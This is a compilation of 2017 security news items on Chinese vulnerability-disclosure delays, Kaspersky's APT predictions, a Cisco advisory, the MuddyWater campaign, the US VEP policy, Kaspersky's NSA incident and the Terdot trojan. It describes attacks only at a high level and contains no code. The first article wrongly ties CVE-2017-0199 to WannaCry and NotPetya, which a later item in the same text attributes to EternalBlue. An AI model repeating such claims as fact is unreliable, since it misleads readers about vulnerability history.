The NSA and CIA exploit leaks have thrown the spotlight on US government stockpiles of 0-day exploits -- and possibly led to this week's government declassification of the Vulnerabilities Equities Policy (VEP) process used to decide whether to disclose or retain the exploits it discovers.

There is no doubt that other nations also hold stockpiles of exploits; but there has been little public information on this. While not being a stockpile per se, Recorded Future has today published research suggesting that China delays disclosure of known critical vulnerabilities, sometimes to enable their immediate use by APT groups with probable Chinese government affiliation.

Today's publication has spun out of earlier research demonstrating that China's national vulnerability database (CNNVD) -- which is run by the Chinese Ministry of State Security (MSS) -- is generally faster at publishing vulnerability details than its U.S. equivalent, the NVD. In a few cases, however, it is considerably slower. These 'outliers' have now been analyzed by Recorded Future with surprising results.

The research takes a close look at two particular vulnerabilities that were, unusually, published by the U.S. NVD much sooner than by China's CNNVD. The first is CVE-2017-0199 -- the exploit used in the WannaCry and NotPetya outbreaks. Details were published by the NVD on April 12, 2017; but were not published by CNNVD until more than 50 days later (June 7, 2017). The WannaCry outbreak, generally attributed to North Korean hackers, occurred between these two dates.

However, the researchers also point to Proofpoint's analysis of Chinese threat actors known as TA459 using the same vulnerability in the same timeframe against military and aerospace organizations in Russia and Belarus. "It is likely," suggests Recorded Future, "that the publication lag for CVE-2017-0199 could have been affected by the MSS which wanted to buy time for the vulnerability to be exploited in its operations or on behalf of another Chinese state-sponsored actor."

The second 'outlier' analyzed by the researchers concerns CVE-2016-10136 and CVE-2016-10138, two vulnerabilities in Android software developed by a company named Shanghai Adups Technology. Kryptowire researchers reported in November 2016 that these vulnerabilities amount to a backdoor in certain Android phones resulting in the transmission of text messages, contact lists, call logs, location information, and other data to a Chinese server.

Details were published by NVD in January 2017, two months after the vulnerability became public knowledge. CNNVD took another eight months before publishing a much less detailed description of the vulnerability. "The systems with these backdoors were overwhelmingly located in China, CNNVD is largely followed and consumed by Chinese businesses and citizens, and the MSS has a mission to collect domestic intelligence. While we cannot determine with certainty that the MSS was exploiting this vulnerability, we believe this is another example of likely MSS interference in the CNNVD publication process."

In total, the researchers analyzed nearly 300 different CVEs that fell outside of the statistical norm for vulnerability reporting in China. "What we discovered," they say, "were numerous clear examples of unexplainable behavior in vulnerability reporting by CNNVD, and cases where we believe the MSS likely have interfered to delay publication."

This is not an example of stockpiling 0-day exploits in the same way as the NSA and the CIA have stockpiled exploits, but are indications that China sometimes delays publication of details either while it is already using the exploits, or to possibly allow for the rapid use of them.

"Our analysis of these critical statistical deviations highlights why an intelligence service should not manage the vulnerability publication process -- it is impossible for an intelligence service to equally uphold the mandates for both vulnerability reporting (transparency) and intelligence operations (secrecy). Our analysis of this dataset demonstrates that in China, one mandate is typically sacrificed -- that of transparency."

This is in sharp contrast to the separation of vulnerability reporting away from the intelligence agencies in the U.S.; and the U.S. attempt this week to increase the transparency over its approach towards vulnerabilities.

Kaspersky Security Bulletin: Threat Predictions for 2018

16.11.2017 Kaspersky Analysis
Advanced Persistent Threats in 2018
By Juan Andrés Guerrero-Saade, Costin Raiu, Kurt Baumgartner on November 15, 2017. 10:01 am
Download the Kaspersky Security Bulletin: Threat Predictions for 2018

As hard as it is to believe, it’s once again time for our APT Predictions. Looking back at a year like 2017 brings the internal conflict of being a security researcher into full view: on the one hand, each new event is an exciting new research avenue for us, as what were once theoretical problems find palpable expression in reality. This allows us to understand the actual attack surface and attacker tactics and to further hone our hunting and detection to address new attacks. On the other hand, as people with a heightened concern for the security posture of users at large, each event is a bigger catastrophe. Rather than consider each new breach as yet another example of the same, we see the compounding cumulative insecurity facing users, e-commerce, financial, and governmental institutions alike.

As we stated last year, rather than thinly-veiled vendor pitching, our predictions are an attempt to bring to bear our research throughout the year in the form of trends likely to peak in the coming year.

Our record – did we get it right?
As a snapshot scorecard of our performance last year, these are some of our 2017 predictions and some examples where relevant:

Espionage and APTs:

Passive implants showing almost no signs of infection come into fashion
Yes – https://securelist.com/unraveling-the-lamberts-toolkit/77990/
Ephemeral infections / memory malware
Yes – https://securelist.com/fileless-attacks-against-enterprise-networks/77403/
Espionage goes mobile
Yes – https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html
Financial Attacks:

The future of financial attacks
Yes – https://securelist.com/lazarus-under-the-hood/77908/

Dirty, lying ransomware
Yes – https://securelist.com/schroedingers-petya/78870/
Industrial threats:

The ICS Armageddon didn’t come yet (and we are happy to be wrong on that), however, we’ve seen ICS come under attack from Industoyer – https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/

A brick by any other name
Yes! BrickerBot – https://arstechnica.com/information-technology/2017/04/brickerbot-the-permanent-denial-of-service-botnet-is-back-with-a-vengeance/
Information Warfare:

Yes, multiple examples – https://citizenlab.ca/2017/05/tainted-leaks-disinformation-phish/
What can we expect in 2018?
More supply chain attacks. Kaspersky Lab’s Global Research and Analysis Team tracks over 100 APT (advanced persistent threat) groups and operations. Some of these are incredibly sophisticated and possess wide arsenals that include zero-day exploits, fileless attack tools, and combine traditional hacking attacks with handovers to more sophisticated teams that handle the exfiltration part. We have often seen cases in which advanced threat actors have attempted to breach a certain target over a long period of time and kept failing at it. This was either due to the fact that the target was using strong internet security suites, had educated their employees not to fall victim to social engineering, or consciously followed the Australian DSD TOP35 mitigation strategies for APT attacks. In general, an actor that is considered both advanced and persistent won’t give up that easily, they’ll continue poking the defenses until they find a way in.
When everything else fails, they are likely to take a step back and re-evaluate the situation. During such a re-evaluation, threat actors can decide a supply chain attack can be more effective than trying to break into their target directly. Even a target whose networks employ the world’s best defenses is likely using software from a third-party. The third party might be an easier target and can be leveraged to attack the better protected original target enterprise.

During 2017, we have seen several such cases, including but not limited to:

ExPetr / NotPetya
These attacks can be extremely difficult to identify or mitigate. For instance, in the case of Shadowpad, the attackers succeeded in Trojanizing a number of packages from Netsarang that were widely used around world, in banks, large enterprises, and other industry verticals. The difference between the clean and Trojanized packages can be dauntingly difficult to notice –in many cases it’s the command and control (C&C) traffic that gives them away.

For CCleaner, it was estimated that over 2 million computers received the infected update, making it one of the biggest attacks of 2017. Analysis of the malicious CCleaner code allowed us to correlate it with a couple of other backdoors that are known to have been used in the past by APT groups from the ‘Axiom umbrella’, such as APT17 also known as Aurora. This proves the now extended lengths to which APT groups are willing to go in order to accomplish their objectives.

Our assessment is that the amount of supply chain attacks at the moment is probably much higher than we realize but these have yet to be noticed or exposed. During 2018, we expect to see more supply chain attacks, both from the point of discovery and as well as actual attacks. Trojanizing specialized software used in specific regions and verticals will become a move akin to waterholing strategically chosen sites in order to reach specific swaths of victims and will thus prove irresistible to certain types of attackers.

More high-end mobile malware. In August 2016, CitizenLab and Lookout published their analysis of the discovery of a sophisticated mobile espionage platform named Pegasus. Pegasus, a so-called ‘lawful interception’ software suite, is sold to governments and other entities by an Israeli company called NSO Group. When combined with zero-days capable of remotely bypassing a modern mobile operating systems’ security defenses, such as iOS, this is a highly potent system against which there is little defense. In April 2017, Google published its analysis of the Android version of the Pegasus spyware which it called Chrysaor. In addition to ‘lawful surveillance’ spyware such as Pegasus and Chrysaor, many other APT groups have developed their own mobile malware implants.
Due to the fact that iOS is an operating system locked down from introspection, there is very little that a user can do to check if their phone is infected. Somehow, despite the greater state of vulnerability of Android, the situation is better on Android where products such as Kaspersky AntiVirus for Android are available to ascertain the integrity of a device.

Our assessment is that the total number of mobile malware existing in the wild is likely higher than currently reported, due to shortcomings in telemetry that makes these more difficult to spot and eradicate. We estimate that in 2018 more high-end APT malware for mobile will be discovered, as a result of both an increase in the attacks and improvement in security technologies designed to catch them.

More BeEF-like compromises with web profiling. Due to a combination of increased interest and better security and mitigation technologies being deployed by default in operating systems, the prices of zero-day exploits have skyrocketed through 2016 and 2017. For instance, the latest Zerodium payout chart lists up to $1,500,000 for a complete iPhone (iOS) Remote jailbreak with persistence attack, which is another way of saying ‘a remote infection without any interaction from the user’.

The incredible prices that some government customers have most certainly chosen to pay for these exploits mean there is increasing attention paid towards protecting these exploits from accidental disclosure. This translates into the implementation of a more solid reconnaissance phase before delivering the actual attack components. The reconnaissance phase can, for instance emphasize the identification of the exact versions of the browser used by the target, their operating system, plugins and other third-party software. Armed with this knowledge, the threat actor can fine tune their exploit delivery to a less sensitive ‘1-day’ or ‘N-day’ exploit, instead of using the crown jewels.

These profiling techniques have been fairly consistent with APT groups like Turla and Sofacy, as well as Newsbeef (a.k.a. Newscaster, Ajax hacking team, or ‘Charming Kitten’), but also other APT groups known for their custom profiling frameworks, such as the prolific Scanbox. Taking the prevalence of these frameworks into account in combination with a surging need to protect expensive tools, we estimate the usage of profiling toolkits such as ‘BeEF‘ will increase in 2018 with more groups adopting either public frameworks or developing their own.

Sophisticated UEFI and BIOS attacks. The Unified Extensible Firmware Interface (UEFI) is a software interface which serves as the intermediary between the firmware and the operating system on modern PCs. Established in 2005 by an alliance of leading software and hardware developers, Intel most notable amongst them, it’s now quickly superseding the legacy BIOS standard. This was achieved thanks to a number of advanced features that BIOS lacks: for example, the ability to install and run executables, networking and Internet capabilities, cryptography, CPU-independent architecture and drivers, etc. The very advanced capabilities that make UEFI such an attractive platform also open the way to new vulnerabilities that didn’t exist in the age of the more rigid BIOS. For example, the ability to run custom executable modules makes it possible to create malware that would be launched by UEFI directly before any anti-malware solution – or, indeed, the OS itself – had a chance to start.
The fact that commercial-grade UEFI malware exists has been known since 2015, when the Hacking team UEFI modules were discovered. With that in mind, it is perhaps surprising that no significant UEFI malware has been found, a fact that we attribute to the difficulty in detecting these in a reliable way. We estimate that in 2018 we will see the discovery of more UEFI-based malware.

Destructive attacks continue. Beginning in November 2016, Kaspersky Lab observed a new wave of wiper attacks directed at multiple targets in the Middle East. The malware used in the new attacks was a variant of the infamous Shamoon worm that targeted Saudi Aramco and Rasgas back in 2012. Dormant for four years, one of the most mysterious wipers in history has returned. Also known as Disttrack, Shamoon is a highly destructive malware family that effectively wipes the victim machine. A group known as the ‘Cutting Sword of Justice’ took credit for the Saudi Aramco attack by posting a Pastebin message on the day of the attack (back in 2012), and justified the attack as a measure against the Saudi monarchy.
The Shamoon 2.0 attacks seen in November 2016 targeted organizations in various critical and economic sectors in Saudi Arabia. Just like the previous variant, the Shamoon 2.0 wiper aims for the mass destruction of systems inside compromised organizations. While investigating the Shamoon 2.0 attacks, Kaspersky Lab also discovered a previously unknown wiper malware that appears to be targeting organizations in Saudi Arabia. We’ve called this new wiper StoneDrill and have been able to link it with a high degree of confidence to the Newsbeef APT group.

In addition to Shamoon and Stonedrill, 2017 has been a tough year in terms of destructive attacks. The ExPetr/NotPetya attack, which was initially considered to be ransomware, turned out to be a cleverly camouflaged wiper as well. ExPetr was followed by other waves of ‘ransomware’ attacks, in which there is little chance for the victims to recover their data; all cleverly masked ‘wipers as ransomware’. One of the lesser known facts about ‘wipers as ransomware’ is perhaps that a wave of such attacks was observed in 2016 from the CloudAtlas APT, which leveraged what appeared to be ‘wipers as ransomware’ against financial institutions in Russia.

In 2018, we estimate that destructive attacks will continue to rise, leveraging its status as the most visible type of cyberwarfare.

More subversion of cryptography. In March 2017, IoT encryption scheme proposals developed by the NSA came into question with Simon and Speck variant ISO approvals being both withdrawn and delayed a second time.
In August 2016, Juniper Networks announced the discovery of two mysterious backdoors in their NetScreen firewalls. Perhaps the most interesting of the two was an extremely subtle change of the constants used for the Dual_EC random number generator, which would allow a knowledgeable attacker to decrypt VPN traffic from NetScreen devices. The original Dual_EC algorithm was designed by the NSA and pushed through NIST. Back in 2013, a Reuters report suggested that NSA paid RSA $10 million to put the vulnerable algorithm in their products as a means of subverting encryption. Even if the theoretical possibility of a backdoor was identified as early as 2007, several companies (including Juniper) continued to use it with a different set of constants, which would make it theoretically secure. It appears that this different set of constants made some APT actor unhappy enough to merit hacking into Juniper and changing the constants to a set that they could control and leverage to decrypt VPN connections.

These attempts haven’t gone unnoticed. In September 2017, an international group of cryptography experts have forced the NSA to back down on two new encryption algorithms, which the organization was hoping to standardize.

In October 2017, news broke about a flaw in a cryptographic library used by Infineon in their hardware chips for generation of RSA primes. While the flaw appears to have been unintentional, it does leave the question open in regards to how secure are the underlying encryption technologies used in our everyday life, from smart cards, wireless networks or encrypted web traffic. In 2018, we predict that more severe cryptographic vulnerabilities will be found and (hopefully) patched, be they in the standards themselves or the specific implementations.

Identity in e-commerce comes into crisis. The past few years have been punctuated by increasingly catastrophic large-scale breaches of personally identifiable information (PII). Latest among these is the Equifax breach reportedly affecting 145.5 million Americans. While many have grown desensitized to the weight of these breaches, it’s important to understand that the release of PII at scale endangers a fundamental pillar of e-commerce and the bureaucratic convenience of adopting the Internet for important paperwork. Sure, fraud and identity theft have been problems for a long time, but what happens when the fundamental identifying information is so widely proliferated that it’s simply not reliable at all? Commerce and governmental institutions (particularly in the United States) will be faced with a choice between scaling back the modern comforts of adopting the Internet for operations or doubling down on the adoption of other multi-factor solutions. Perhaps thus far resilient alternatives like ApplePay will come into vogue as de facto means of insuring identity and transactions, but in the meantime we may see a slowdown in the critical role of the Internet for modernizing tedious bureaucratic processes and cutting operational costs.
More router and modem hacks. Another known area of vulnerability that has gone vastly ignored is that of routers and modems. Be they home or enterprise, these pieces of hardware are everywhere, they’re critically important to daily operations, and tend to run proprietary pieces of software that go unpatched and unwatched. At the end of the day, these little computers are Internet-facing by design and thereby sitting at a critical juncture for an attacker intent on gaining persistent and stealthy access to a network. Moreover, as some very cool recent research has shown, in some cases attackers might even be able to impersonate different Internet users, making it possible to throw off the trail of an attacker entirely to a different connecting address. At a time of increased interest in misdirection and false flags, this is no small feat. Greater scrutiny of these devices will inevitably yield some interesting findings.
A medium for social chaos. Beyond the leaks and political drama of the past year’s newfound love for information warfare, social media itself has taken a politicized role beyond our wildest dreams. Whether it’s at the hand of political pundits or confusing comedic jabs at Facebook’s CEO by South Park’s writers, eyes have turned against the different social media giants demanding some level of fact-checking and identification of fake users and bots attempting to exert disproportionate levels of social influence. Sadly, it’s becoming obvious that these networks (which base their success on quantified metrics like ‘daily active users’) have little incentive to truly purge their user base of bots. Even when these bots are serving an obvious agenda or can be tracked and traced by independent researchers. We expect that as the obvious abuse continues and large bot networks become accessible to wider swaths of politically unsavory characters, that the greater backlash will be directed at the use of social media itself, with disgusted users eagerly looking for alternatives to the household giants that revel in the benefits of the abuse for profits and clicks.
APT predictions – conclusion
In 2017 we pronounced the death of Indicators of Compromise. In 2018, we expect to see advanced threat actors playing to their new strengths, honing their new tools and the terrifying angles described above. Each year’s themes and trends shouldn’t be taken in isolation – they build on each other to enrich an ever-growing landscape of threats facing users of all types, be it individuals, enterprise, or government. The only consistent reprieve from this onslaught is the sharing and knowledgeable application of high-fidelity threat intelligence.

While these predictions cover trends for advanced targeted threats, individual industry sectors will face their own distinct challenges. In 2018, we wanted to shine the spotlight on some of those as well – and have prepared predictions for the connected healthcare, automotive, financial services, and industrial security sectors, as well as cryptocurrencies. You can find them all here!

Cisco issued a security advisory warning of a flaw in Cisco Voice Operating System software
16.11.2017 securityaffairs

Cisco issued a security advisory warning of a vulnerability in Cisco Voice Operating System software platform that affects at least 12 products.
The tech giant Cisco issued a security advisory warning of a vulnerability in Cisco Voice Operating System software platform that could be triggered by an unauthenticated, remote hacker to gain unauthorized and elevated access to vulnerable devices.

The flaw in Cisco Voice Operating System software platform, tracked as CVE-2017-12337, was rated as Critical

“A vulnerability in the upgrade mechanism of Cisco collaboration products based on the Cisco Voice Operating System software platform could allow an unauthenticated, remote attacker to gain unauthorized, elevated access to an affected device.” reads the Cisco Security Bulletin.

“The vulnerability occurs when a refresh upgrade or Prime Collaboration Deployment (PCD) migration is performed on an affected device. When a refresh upgrade or PCD migration is completed successfully, an engineering flag remains enabled and could allow root access to the device with a known password.”

The US-CERT issued an alert related to the flaw encouraging users and administrators to review apply the necessary update.

Cisco issued a security advisory warning of a flaw in Cisco Voice Operating System software

A remote attacker that manages to access the vulnerable devices over SSH File Transfer Protocol (SFTP) could gain root access. 12 products are affected by the vulnerability, including Cisco Prime License Manager, Cisco SocialMiner, Cisco Emergency Responder and Cisco MediaSense.

“An attacker who can access an affected device over SFTP while it is in a vulnerable state could gain root access to the device. This access could allow the attacker to compromise the affected system completely.” continues the security bulletin.

The vulnerability could be fixed by upgrading the device using the standard upgrade method to an Engineering Special Release, service update, or a new major release of the affected product.

“If the vulnerable device is subsequently upgraded using the standard upgrade method to an Engineering Special Release, service update, or a new major release of the affected product, this vulnerability is remediated by that action,” said Cisco.

CISCO highlighted that Engineering Special Releases that are installed as COP files do not fix this vulnerability.

Middle East 'MuddyWater' Attacks Difficult to Clear Up
16.11.2017 securityweek
Long-lasting targeted attacks aimed at entities in the Middle East are difficult to attribute despite being analyzed by several researchers, Palo Alto Networks said this week.

Dubbed “MuddyWater” by the security firm because of the high level of confusion they have already created, the attacks took place between February and October 2017. The campaign has made use of a variety of malicious documents, and hit targets in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

The attacks, researchers say, use a slowly evolving PowerShell-based first stage backdoor named POWERSTATS. The activity related to this threat actor continues despite existing reports, with the only observed changes being related to tools and techniques.

The malicious documents used in these attacks are almost identical to those in recently observed incidents targeting the Saudi Arabian government. Those documents were similar to files previously associated with a series of fileless assaults that Morphisec linked to a single attack framework. Some of these attacks were attributed to the hacking group known as FIN7.

According to a new Palo Alto Networks report, the attacks might have been mistakenly associated with the FIN7 group. A command and control (C&C) server delivering the FIN7-linked DNSMessenger tool was said to have been employed by MuddyWater as well, but there’s no evidence that the latter group ever used the utility, the researchers claim.

Between February and October, the malicious documents associated with the group’s activity had been tailored according to the target regions. They often used the logos of branches of local government in an attempt to trick users into enabling malicious macros.

The delivery method might have changed between attacks, but the final payload remained the same non-public PowerShell backdoor mentioned above. Moreover, the malicious documents used in this campaign shared the same C&C infrastructure and featured similar attributes.

“Based on these connections we can be confident that all the files and infrastructure […] are related, since more than one of these can be used to link each of the samples discussed in each case,” Palo Alto notes. The researchers also published lists of C&C servers, compromised sites, and related files.

Tools used by the group have been well-documented in previous reports, including open-source utilities such as Meterpreter, Mimikatz, Lazagne, Invoke-Obfuscation, and more. In some recent attacks, GitHub is used as a hosting site for the POWERSTATS custom backdoor, as the actor controls multiple GitHub repositories, the researchers say.

MuddyWater even compromised accounts at third-party organizations to send their malware. As part of an attack, the malicious document used was nearly identical to a legitimate attachment that the same recipient received later.

“This indicates that the attackers stole and modified a legitimate document from the compromised user account, crafted a malicious decoy Word macro document using this stolen document and sent it to the target recipient who might be expecting the email from the original account user before the real sender had time to send it,” the researchers explain.

According to Palo Alto Networks, the reports previously associating this cluster of activity to FIN7 would rather create confusion. The FIN7 group is financially motivated and targets organizations in the restaurant, services and financial sectors, which suggests that the threat actor is unlikely to be tied to espionage-focused attacks in the Middle East.

Malware associated with FIN7 hasn’t been observed in MuddyWater attacks, and the researchers also claim that there might be a mistake in the report linking the attacks to FIN7. However, they also admit that the hackers might have planted a false flag when realizing they were under investigation.

“Whilst we could conclude with confidence that the attacks discussed in this article are not FIN7 related, we were not able to answer many of our questions about the MuddyWater attacks. We are currently unable to make a firm conclusion about the origin of the attackers, or the specific types of information they seek out once on a network,” the security researchers say.

White House Cyber Chief Provides Transparency Into Zero-Day Disclosure Process
16.11.2017 securityweek BigBrothers
Government Vulnerability Disclosure Process (VEP)

The U.S. government Wednesday introduced greater transparency into its Vulnerabilities Equities Policy (VEP) program. This is the process by which government agencies decide whether to disclose or stockpile the cyber vulnerabilities they discover.

In a lengthy statement, White House Cybersecurity Coordinator Rob Joyce explained why not all discoveries are disclosed. That will not change; but in introducing greater transparency into the process of decision-making, he hopes "to demonstrate to the American people that the Federal Government is carefully weighing the risks and benefits as we carry out this important mission."

The extent to which the government agencies use cyber vulnerabilities to further their own overseas missions became known with Edward Snowden's leaked documents. This sparked greater discussion over the morality of government collection and use of vulnerabilities without disclosing the existence of those vulnerabilities to the product vendors concerned.

Microsoft, for example, developed detailed proposals for introducing international norms of cyber behavior that would rely on no government keeping private supplies (hoarding) of undisclosed 0-day vulnerabilities; and also called for a digital Geneva Convention that would "mandate that governments report vulnerabilities to vendors rather than stockpile, sell or exploit them." This is unlikely to happen. "Our national capacity to find and hold criminals and other rogue actors accountable relies on cyber capabilities enabled by exploiting vulnerabilities in the digital infrastructure they use. Those exploits produce intelligence for attribution, evidence of crimes, enable defensive investigations, and posture us to respond to our adversaries with cyber capabilities," said Joyce in his statement.

The theft and release of 'Equation Group' (generally considered to be the NSA) tools and exploits by the Shadow Brokers (generally considered to be 'Russia') brought new emphasis to the issue. These tools included the EternalBlue exploit soon used by hackers (quite probably nation-state affiliated hackers) in the worldwide WannaCry and NotPetya ransomware outbreaks.

Joyce formerly served as head of the NSA’s Tailored Access Operations (TAO) unit—an offensive hacking team tasked with breaking into systems of foreign entities.

The unproven implication is that if the NSA had disclosed their vulnerabilities, the worldwide disruption caused by WannaCry and NotPetya might not have happened. There is, however, little mention of the danger of theft inherent in any store of vulnerabilities in this week's VEP transparency announcement, beyond two considerations in the decision process: "If USG knowledge of this vulnerability were to be revealed, what risks could that pose for USG relationships with industry?", and "If USG knowledge of this vulnerability were to be revealed, what risks could that pose for USG international relations?"

The full unclassified VEP process document (PDF) "describes the Vulnerabilities Equities Policy and Process for departments and agencies of the United States Government (USG) to balance equities and make determinations regarding disclosure or restriction when the USG obtains knowledge of newly discovered and not publicly known vulnerabilities in information systems and technologies."

In short, it explains the process without altering the policy. Its purpose is to introduce transparency and reassure the public that the government will weigh the offensive advantages obtained against the threat of public disruption if used by third-parties, for each 0-day vulnerability it discovers.

That transparency is valuable, but there remain numerous concerns. One is that the VEP continues to be an administrative exercise not enshrined in law. It can be changed at any time without public or legislative overview.

In May 2017, Senators Brian Schatz (D-Hawaii), Ron Johnson (R-Wis.), and Cory Gardner (R-Colo.) and U.S. Representatives Ted Lieu (D-Calif.) and Blake Farenthold (R-Texas) introduced the 'Protecting Our Ability to Counter Hacking Act of 2017' -- the PATCH Act.

Its purpose is to promote the transparency introduced this week, but make it a legal requirement rather than an administrative choice. The Patch Act appears to have stalled, with no real progress since its introduction in May.

Other concerns appear in the Exceptions section of the VEP process document. For example, "The United States Government's decision to disclose or restrict vulnerability information could be subject to restrictions by partner agreements and sensitive operations." This will exclude 0-days discovered by, say, GCHQ and disclosed to the NSA under an effective non-disclosure agreement; and it could also exclude 0-days expected to be used in potential operations (such as Stuxnet).

It has long been suspected that members of the Five Eyes surveillance alliance share intelligence on each other's nationals to circumvent individual laws forbidding surveillance of own subjects. If this happens in practice, a similar arrangement between each members' intelligence agencies would exclude shared vulnerabilities from the VEP process. Both exclusions will undoubtedly be used by the more offense-driven agencies (the NSA and the CIA) to both hold and keep secret their most 'valuable' exploits.

Nevertheless, the purpose of declassifying the VEP process is primarily to reassure the American people that the secretive intelligence agencies do not have free rein in the vulnerabilities they keep and the vulnerabilities they use -- and to that extent it will probably succeed.

'Fake news' Becomes a Business Model: Researchers
16.11.2017 securityweek CyberCrime
Cyber criminals have latched onto the notion of "fake news" and turned it into a profitable business model, with services starting at under $10, security researchers said Thursday.

The online security firm Digital Shadows released a report highlighting services aimed at creating bogus media websites, fake reviews and social media "bots" or automated accounts to promote or denigrate commercial products and services.

One of the methods used is creating bogus or "spoofed" media websites designed to look like those of legitimate news organizations. The researchers uncovered some 2,800 "live spoof" sites.

This can be done by changing a single letter in a web address to create a fake "clone" of a legitimate news organization site.

Some criminals use the same methods as Russia-based propagandists -- modifying legitimate documents and leaking them as part of disinformation campaigns, the report said.

"Like any good news story, content will be shared, liked, reposted and distributed across many different platforms and channels," the report said.

"The more widely a piece of disinformation can be spread, the better the chances of it capturing the public imagination and achieving its objective -- whether that is to discredit an opponent, sow discord or to generate profit."

While the use of these tools in political campaigns has become a growing concern, the same methods can be used for profit, according to the report.

"The sheer availability of tools means that barriers to entry are lower than ever," said Rick Holland, vice president of strategy at Digital Shadows.

"It means this now extends beyond geopolitical to financial interests that affect businesses and consumers."

Holland said "tool kits" are available on a trial basis for as little as $7 to controls the activities of social media bots.

Retailers are also a target, with one service offering Amazon ranking, reviews, votes, listing optimization and selling promotions at prices from $5 for an unverified review to $500 for a monthly retainer.

Still other services tout the merits of crypto-currencies to push up the price, similar to stock "pump and dump" scams, the report said.

Many of these services are advertised on the anonymous "dark web" where users are difficult to trace, according to Holland.

But some are openly advertised as marketing tools as well, he said.

Holland said misinformation has been around for a long time but that "what has changed in the digital world is the speed such techniques spread around the world."

Kaspersky Shares More Details on NSA Incident
16.11.2017 securityweek  BigBrothers
Kaspersky Lab on Thursday shared more details from its investigation into reports claiming that Russian hackers stole data belonging to the U.S. National Security Agency (NSA) by exploiting the company’s software.

The Wall Street Journal reported last month that hackers working for the Russian government stole information on how the U.S. penetrates foreign networks and how it defends against cyberattacks. The files were allegedly taken in 2015 from the personal computer of an NSA contractor who had been using a security product from Kaspersky Lab.

The WSJ article suggested that Kaspersky either knowingly helped the Russian government obtain the files or that the hackers exploited vulnerabilities in the company’s software without the firm’s involvement.

In a preliminary report, Kaspersky said the incident referenced in the WSJ article likely took place in 2014, when the company was investigating malware used by the Equation Group, a threat actor later associated with the NSA.

In a more technical report published on Thursday, Kaspersky said the incident likely occurred between September 11, 2014 and November 17, 2014 – the security firm believes WSJ’s source may have mixed up the dates.

In September 2014, Kaspersky’s products detected malware associated with the Equation Group on a device with an IP address pointing to the Baltimore area in Maryland. It’s worth noting that the NSA headquarters are in Fort Meade, Maryland, less than 20 miles from the city of Baltimore.

The Kaspersky product present on the device automatically sent an archive containing the suspected malware files back to the company’s systems for further analysis. The said archive contained source code for Equation malware, along with four documents with classification markings (e.g. secret, confidential).

The Kaspersky analyst who found the archive informed the company’s CEO of its content and the decision was made to remove the files from its storage systems.

So is it possible that the classified files were somehow obtained by Russian actors from Kaspersky’s systems? The firm denies spying for the Russian government and claims the data was removed from its systems – only some statistics and metadata remain – but it cannot guarantee that its employees handled the data appropriately.

“We cannot assess whether the data was ‘handled appropriately’ (according to US Government norms) since our analysts have not been trained on handling US classified information, nor are they under any legal obligation to do so,” the company said.

While Kaspersky admitted that its systems were breached in 2015 by a threat group linked to Israeli intelligence, the company said it found no evidence that the NSA files left its systems.

As for the assumption that Kaspersky’s products may have been specifically configured to look for secret files on the systems they were installed on, the company said all the signatures for retrieving files from a user’s device are carefully handled and verified by an experienced developer, and there is no evidence that anyone created a signature for files marked “secret” during the Equation investigation.

The company determined that an analyst did create a signature for files with names that included the string “secret,” but it was for a piece of malware associated with the TeamSpy espionage campaign. The signature included a path specific for that malware to avoid false positives.

Another possible scenario is related to the fact that the device of the NSA contractor got infected with malware after the Kaspersky antivirus was disabled. The security product was temporarily disabled when the user attempted to install a pirated copy of Microsoft Office using a known activation tool.

After the antivirus was re-enabled, Kaspersky detected 121 threats on the system. The malware associated with the Office activation tool was Smoke Bot (aka Smoke Loader), which had been sold on Russian underground forums since 2011. At the time of the incident, the malware communicated with servers apparently set up by an individual located in China.

Kaspersky says it’s also possible that the contractor’s computer may have been infected with stealthy malware from a sophisticated threat actor that was not detected at the time.

Several recent media reports focused on Kaspersky’s alleged connection to the Kremlin, which has led to many U.S. officials raising concerns regarding the use of company’s products. As a result, the Department of Homeland Security (DHS) has ordered all government agencies to identify and remove the firm’s products, despite the apparent lack of evidence supporting the claims.

In an effort to clear its name, Kaspersky announced the launch of a new transparency initiative that involves giving partners access to source code and paying significantly larger bug bounties for vulnerabilities found in the firm’s products.

Terdot Banking Trojan Could Act as Cyber-Espionage Tool
16.11.2017 securityweek BigBrothers
The Terdot banking Trojan packs information-stealing capabilities that could easily turn it into a cyber-espionage tool, Bitdefender says in a new report.

Highly customized and sophisticated, Terdot is based on the source code of ZeuS, which leaked online in 2011. The banking Trojan resurfaced in October last year and Bitdefender has been tracking its whereabouts ever since, the security company notes in a technical paper (PDF).

Terdot was designed to operate as a proxy to perform man-in-the-middle (MitM) attacks, as well as to steal browser information such as login credentials or the stored credit card data. Furthermore, the malware is capable of injecting HTML code into visited web pages.

The malware relies more on legitimate applications for its nefarious purposes, including certificate injection tools, than on in-house developed software.

Although designed as a banking Trojan, Terdot’s capabilities go well beyond its primary purpose, Bitdefender notes. The threat can eavesdrop and modify traffic on social media and email platforms, and also packs automatic update features that allow it to download and execute any file provided by the operator.

This malware family mainly focuses on targeting Canadian institutions from the banking sector, but the analyzed samples would also target email service providers such as Microsoft’s live.com, Yahoo Mail, and Gmail. It also targets social networks such as Facebook, Twitter, Google Plus, and YouTube. According to Bitdefender, the malware avoids gathering data related to vk.com, the largest social platform in Russia.

The main distribution channel for the Trojan is the Sundown exploit kit, but Terdot was also observed spreading via malicious emails containing a button masquerading behind a PDF icon. When clicked on, it would execute obfuscated JavaScript code to download and run the malware file.

A complex chain of droppers, injections, and downloaders is used to deliver Terdot and third-party utilities employed by the threat, in an attempt to trick defenses and hinder analysis.

After infection, the malware injects itself into the browser process by hooking very-low network socket operations to direct connections to its own proxy and read traffic (which also allows it to alter traffic). Terdot can steal authentication data either by inspecting the client’s requests or by injecting spyware JavaScript code into the response.

The malware can also bypass secure connections by generating certificates for each of the domains the victim visits.

Terdot’s components are split across numerous processes, each with a specific role. Long-running Windows processes such as Windows Explorer, for example, are used either for injection purposes to spread the infection inside the machine or as watchdogs, to hinder disinfection. The malware uses the msiexec.exe process for running its MitM proxy.

In their technical analysis of the threat, Bitdefender’s security researchers explain that, after installation and initial handshake with the command and control server, the malware downloads updates and commands from the same URL it sends system information to (including a unique identifier, malware version, CRC32s of downloaded data, Windows version, processor architecture, system language, and network adapter IP).

The bot features support for a wide range of commands: can uninstall itself, can run a specified file, can execute a simple GET request, can add or remove URLs to/from a list that signals the proxy to disable injections for them, and can add or remove URLs to a blocking list. The malware also features a Domain Generation Algorithm (DGA).

